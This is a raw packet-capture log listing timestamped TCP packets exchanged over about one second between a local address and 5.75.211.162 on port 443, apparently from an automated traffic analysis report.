Sep 27, 2024 00:28:53.143951893 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.143990040 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.144007921 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.151647091 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.151670933 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.151767015 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.151776075 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.151839972 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.157143116 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.157165051 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.157269955 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.157290936 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.157335997 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.167795897 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.167821884 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.167924881 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.167933941 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.168082952 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.186750889 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.186778069 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.186881065 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.186897993 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.186949015 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.202683926 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.202709913 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.202836037 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.202848911 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.202864885 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.202889919 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.214318037 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.214348078 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.214473009 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.214482069 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.214653969 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.223655939 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.223716021 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.223786116 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.223807096 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.223838091 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.223853111 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.236308098 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.236326933 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.236426115 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.236444950 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.236491919 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.243978024 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.243997097 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.244081974 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.244101048 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.244148970 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.249856949 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.249872923 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.249953032 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.249965906 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.250016928 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.260250092 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.260271072 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.260385036 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.260396957 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.260440111 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.279273987 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.279300928 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.279393911 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.279405117 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.279447079 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.295167923 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.295186996 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.295311928 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.295327902 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.295373917 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.307883024 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.307900906 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.308013916 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.308024883 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.308065891 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.319093943 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.319116116 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.319222927 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.319231033 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.319251060 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.319273949 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.328896999 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.328913927 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.329024076 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.329031944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.329076052 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.336987972 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.337007046 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.337124109 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.337132931 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.337184906 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.342247009 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.342268944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.342367887 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.342375040 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.342422962 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.352686882 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.352705956 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.352797985 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.352823019 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.352883101 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.371906996 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.371931076 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.372071028 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.372081995 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.372127056 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.387665987 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.387691021 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.387829065 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.387835979 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.387885094 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.402370930 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.402391911 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.402499914 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.402507067 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.402563095 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.411333084 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.411349058 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.411473036 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.411484003 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.411529064 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.421534061 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.421555042 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.421672106 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.421679974 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.421730995 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.429311037 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.429337978 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.429486990 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.429500103 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.429547071 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.434612036 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.434628963 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.434720039 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.434726000 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.434772015 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.470717907 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.470750093 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.470890045 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.470901012 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.470951080 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.547456026 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.547478914 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.547656059 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.547673941 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.547718048 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.578762054 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.578788996 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.578939915 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.578948975 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.578996897 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.588443995 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.588464975 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.588579893 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.588589907 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.588638067 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.613549948 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.613570929 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.613704920 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.613717079 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.613770008 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.624614954 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.624634027 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.624737978 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.624747038 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.624792099 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.631824970 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.631850004 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.631958961 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.631974936 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.632029057 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.633459091 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.633475065 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.633543968 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.633552074 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.633599997 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.661462069 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.661484957 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.661573887 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.661587954 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.661633015 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.682383060 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.682404995 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.682492018 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.682499886 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.682543039 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.688965082 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.688985109 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.689052105 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.689059973 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.689094067 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.689110041 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.691099882 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.691121101 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.691173077 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.691179991 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.691212893 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.691226959 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.709764957 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.709794044 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.709887028 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.709897041 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.709944010 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.716825962 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.716857910 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.716939926 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.716947079 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.716991901 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.724385977 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.724409103 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.724607944 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.724615097 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.724663973 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.725718021 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.725738049 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.725801945 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.725807905 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.725853920 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.753762007 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.753784895 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.753895998 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.753907919 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.753956079 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.774912119 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.774939060 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.775058031 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.775070906 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.775139093 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.781531096 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.781553030 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.781652927 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.781662941 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.781857967 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.783502102 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.783523083 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.783601046 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.783607006 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.783649921 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.802117109 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.802134991 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.802246094 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.802261114 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.802309036 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.809422016 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.809437990 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.809534073 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.809542894 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.809583902 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.816764116 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.816781044 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.816874027 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.816888094 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.816936016 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.818226099 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.818247080 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.818310976 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.818316936 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.818361044 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.846307993 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.846337080 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.846529961 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.846549034 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.846617937 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.867288113 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.867305994 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.867419958 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.867434025 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.867484093 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.873904943 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.873919964 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.874015093 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.874021053 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.874068022 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.875895023 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.875911951 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.876010895 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.876017094 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.876060963 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.894418001 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.894435883 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.894550085 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.894556046 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.894608974 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.902065992 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.902082920 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.902174950 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.902180910 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.902229071 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.909233093 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.909248114 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.909354925 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.909359932 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.909406900 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.910629034 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.910643101 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.910732031 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.910737038 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.910784960 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.938672066 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.938692093 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.938791037 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.938823938 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.938869953 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.960318089 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.960342884 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.960536003 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.960562944 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.960617065 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.970556974 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.970587015 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.970699072 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.970716000 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.970763922 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.971596956 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.971617937 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.971719980 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.971729040 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.971777916 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.997241974 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.997263908 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.997426033 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:53.997437954 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:53.997489929 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.013783932 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.013808966 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.013961077 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.013977051 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.014033079 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.023907900 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.023936033 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.024044037 CEST	57893	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:54.024058104 CEST	443	57893	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:54.024104118 CEST	57893	443	192.168.2.6	5.75.211.162
